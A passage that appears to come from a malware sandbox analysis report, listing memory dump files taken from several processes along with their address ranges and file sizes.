                                                                                              • memory/4692-791-0x000000001D460000-0x000000001D46E000-memory.dmp

                                                                                                Filesize

                                                                                                56KB

                                                                                              • memory/4692-817-0x000000001E010000-0x000000001E132000-memory.dmp

                                                                                                Filesize

                                                                                                1.1MB

                                                                                              • memory/4692-792-0x000000001BEB0000-0x000000001BECE000-memory.dmp

                                                                                                Filesize

                                                                                                120KB

                                                                                              • memory/5096-807-0x00000248D3E80000-0x00000248D3EA2000-memory.dmp

                                                                                                Filesize

                                                                                                136KB

                                                                                              • memory/5620-773-0x0000020AFAD90000-0x0000020AFAD91000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/5620-772-0x0000020AFAD90000-0x0000020AFAD91000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/5620-771-0x0000020AFAD90000-0x0000020AFAD91000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/5620-783-0x0000020AFAD90000-0x0000020AFAD91000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/5620-781-0x0000020AFAD90000-0x0000020AFAD91000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/5620-782-0x0000020AFAD90000-0x0000020AFAD91000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/5620-777-0x0000020AFAD90000-0x0000020AFAD91000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/5620-778-0x0000020AFAD90000-0x0000020AFAD91000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/5620-779-0x0000020AFAD90000-0x0000020AFAD91000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/5620-780-0x0000020AFAD90000-0x0000020AFAD91000-memory.dmp

                                                                                                Filesize

                                                                                                4KB